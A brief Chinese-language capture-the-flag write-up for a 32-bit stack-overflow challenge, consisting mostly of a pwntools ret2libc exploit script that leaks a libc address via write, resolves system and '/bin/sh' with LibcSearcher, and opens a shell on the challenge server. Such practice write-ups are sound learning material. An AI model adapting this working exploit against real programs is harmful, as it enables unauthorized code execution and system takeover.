栈不可执行,32位程序
这漏洞,太熟了,ret2libc3
from pwn import *from LibcSearcher import*context(log_level = 'debug')#io = process("level3")io = remote("node4.buuoj.cn",28740)#context.arch = "amd64"elf = ELF('level3')offest = 0x88write_got = elf.got['write']write_plt = elf.plt['write']main_addr = elf.sym['main']io.recvuntil("Input:\n")payload = b'a'*(offest+4) + p32(write_plt) + p32(main_addr) + p32(1)+p32(write_got)+p32(4)io.sendline(payload)write_addr = u32(io.recv(4))log.success('write_addr ==>'+hex(write_addr))libc = LibcSearcher("write",write_addr)libcbase =write_addr - libc.dump('write')system_addr =libcbase +libc.dump('system')bin_sh_addr =libcbase + libc.dump("str_bin_sh")io.recvuntil("Input:\n")payload1 = b'a' *(offest+4)+p32(system_addr)+b'aaaa'+p32(bin_sh_addr)io.sendline(payload1)io.interactive()
不过我每次本地都打不通,打服务器就打通了。。。。。。。。应该是libc的问题,,,,,
若有收获,就点个赞吧
0 人点赞
